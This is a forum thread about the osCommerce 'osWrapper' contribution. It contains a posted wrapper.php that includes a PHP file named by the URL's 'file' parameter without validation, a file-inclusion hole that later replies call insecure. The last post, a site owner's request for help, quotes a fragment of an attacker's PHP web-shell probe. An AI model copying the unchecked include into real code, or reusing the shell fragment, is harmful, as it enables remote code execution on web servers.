Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

[Contribution] - osWrapper


Guest

Recommended Posts

Here's my fix for the breadcrumb conundrum:

 

catalog/wrapper.php:

<?php

 require('includes/application_top.php');



// the following cPath references come from application_top.php

 $category_depth = 'top';

 if ($cPath) {

   $categories_products_query = tep_db_query("select count(*) as total from " . TABLE_PRODUCTS_TO_CATEGORIES . " where categories_id = '" . $current_category_id . "'");

   $cateqories_products = tep_db_fetch_array($categories_products_query);

   if ($cateqories_products['total'] > 0) {

     $category_depth = 'products'; // display products

   } else {

     $category_parent_query = tep_db_query("select count(*) as total from " . TABLE_CATEGORIES . " where parent_id = '" . $current_category_id . "'");

     $category_parent = tep_db_fetch_array($category_parent_query);

     if ($category_parent['total'] > 0) {

       $category_depth = 'nested'; // navigate through the categories

     } else {

       $category_depth = 'products'; // category has no products, but display the 'no products' message

     }

   }

 }



 require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_DEFAULT);

 require ('wrapped/'.$file.'.php');

 $breadcrumb->add(NAVBAR_TITLE, tep_href_link('wrapper.php', 'file='.$file.'.php', 'NONSSL'));

?>

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">

<html <?php echo HTML_PARAMS; ?>>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=<?php echo CHARSET; ?>">

<title><?php echo TITLE; ?></title>

<base href="<?php echo (getenv('HTTPS') == 'on' ? HTTPS_SERVER : HTTP_SERVER) . DIR_WS_CATALOG; ?>">

<link rel="stylesheet" type="text/css" href="stylesheet.css">

</head>

<body marginwidth="0" marginheight="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">

<!-- header //-->

<?php require(DIR_WS_INCLUDES . 'header.php'); ?>

<!-- header_eof //-->



<!-- body //-->

<table border="0" width="100%" cellspacing="3" cellpadding="3">

 <tr>

   <td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">

<!-- left_navigation //-->

<?php require(DIR_WS_INCLUDES . 'column_left.php'); ?>

<!-- left_navigation_eof //-->

   </table></td>

<td width="100%" valign="top">

<!-- body_text //-->





<?

if ($file != '') {

echo TEXT_TO_WRAP;

} else {

   print "<b><a href=wrapper.php?file=index.php><u>Access your file manager by clicking here.</u></a></b>";

}

?>











<!-- body_text_eof //-->

</td>

<td width="<?php echo BOX_WIDTH; ?>" valign="top"><table border="0" width="<?php echo BOX_WIDTH; ?>" cellspacing="0" cellpadding="2">

<!-- right_navigation //-->

<?php require(DIR_WS_INCLUDES . 'column_right.php'); ?>

<!-- right_navigation_eof //-->

   </table></td>

 </tr>

</table>

<!-- body_eof //-->



<!-- footer //-->

<?php require(DIR_WS_INCLUDES . 'footer.php'); ?>

<!-- footer_eof //-->

<br>

</body>

</html>

<?php require(DIR_WS_INCLUDES . 'application_bottom.php'); ?>

 

and chage the wrapped files so that more than JUST the text is included. for example, here's my catalog/wrapped/demo.php

 

<?php



define('NAVBAR_TITLE', 'this is a test');

define('TEXT_TO_WRAP', '

<table border="0" width="100%" cellspacing="0" cellpadding="0">

 <tr>

   <td height="14" class="infoBoxHeading"><img src="images/infobox/corner_left.gif" border="0" alt="" width="11" height="14"></td>

   <td height="14" class="infoBoxHeading" width="100%">

   <!-- BEGIN TABLE TITLE HERE -->



My little demo page.



   <!-- END TABLE TITLE HERE -->

   </td>

   <td height="14" class="infoBoxHeading"><img src="images/infobox/corner_right_left.gif" border="0" alt="" width="11" height="14"></td>

 </tr>

</table>

<table border="0" width="100%" cellspacing="0" cellpadding="1" class="infoBox">

 <tr>

   <td><table border="0" width="100%" cellspacing="0" cellpadding="4" class="infoBoxContents">

 <tr>

   <td class="smallText" width="33%" valign="top">

   <!-- center content here -->



<center>

   Welcome to my demo page.<br>

   <br>

   Any thing can be used here, <?="including php!!"; ?>

</center>



   <!-- end center content here -->

   </td>

 </tr>

</table>

</td>

 </tr>

</table>');



?>

 

working version can be seen here: www.magshack.com/wrapper.php?file=demo

 

(note - no more need for .php in file define in the URL)

 

- Greg

Link to comment
Share on other sites

Hey, Greg;

 

Why don't you zip that puppy up and add it to the original contribution folder as a separate file with an explanation?

 

:wink:

... if you want to REALLY see something that doesn't set up right out of the box without some tweaking,

try being a Foster Parent!

Link to comment
Share on other sites

ugh - in the above wrapped/demo.php, be sure to properly punctuate any php tags within the wrapped text:

 

<center>

   Welcome to my demo page.<br>

   <br>

   Any thing can be used here,'. "including php!!" .'

</center>

 

rather than

<center>

   Welcome to my demo page.<br>

   <br>

   Any thing can be used here, <?="including php!!"; ?>

</center>

Link to comment
Share on other sites

My first post here and also my first contribution.

 

This whole contribution needs re-writing from the ground up as it's insecure, and poorly coded. I've not yet been able to find time to do it :(

 

A Believer SHOULD know better.....

 

 

Encouragement, guidance and feedback generally produce better results...

 

Regards

 

Ed

i-netmedia

Link to comment
Share on other sites

Encouragement.. thats the way to go.. I like it :D

 

Greg.. I tried your code but it would work.. I kept getting damned errors.

Copy and paste.,... thats all I have to do.. and I can't get that right!!!

 

:lol:

 

Tracy

Link to comment
Share on other sites

I'm not understanding. What security problem is exactly wrong here? I've been using this with no problems that I am aware of.

 

Look in your server error log.

 

I just looked, what are we looking for? There are no entries relating to oscWrapper ??

 

Maybe you could enlighten us all :-)

 

Regards

 

Ed

Link to comment
Share on other sites

Thanks, Burt -- I'll include your fixes with a contribution that also fixes with breadcrumbs. I agree - wrapper isn't the best solution. I personally am not using it, but I can certainly see its utility for certain circumstances. The Information Unlimited contribution does offer similar functionality...

 

Your fixes should address any security concerns by limiting the pages that can be called by wrapper. Are there any opther security issues that you have identified?

 

Thanks,

 

Greg

Link to comment
Share on other sites

  • 3 weeks later...

Maybe a bit late.

 

I like this mod really handy for adding pages quick.

 

Only problem I get is when I first arrive at my site it bolts on the osCsid= code after my link, so it can't find page properly, but checking through some of you guys and gals who have tried it you seemed to have cracked it am I missing something.

 

Nev

Link to comment
Share on other sites

  • 6 months later...
  • 6 months later...

Hi Everyone

 

Someone tried to call the URL below this morning (about 6am UK time).

 

 

The file, HKZ.TXT contains the following coding:

 

bash-2.05#  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");

  $output = ob_get_contents();

  ob_end_clean();

  $output = str_replace("\n","\nbash-2.05# ",$output);

  if (!empty($output)) echo  str_replace(">", ">", str_replace("<", "<", $output));

 

?>

 

Anyone have any ideas on what they were trying to achieve? My understanding is that the osWrapper function cannot call an external site, as it does not exist within the 'wrapped' folder (my tests indicate an error message every time I have tried).

 

Comments appreciated!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...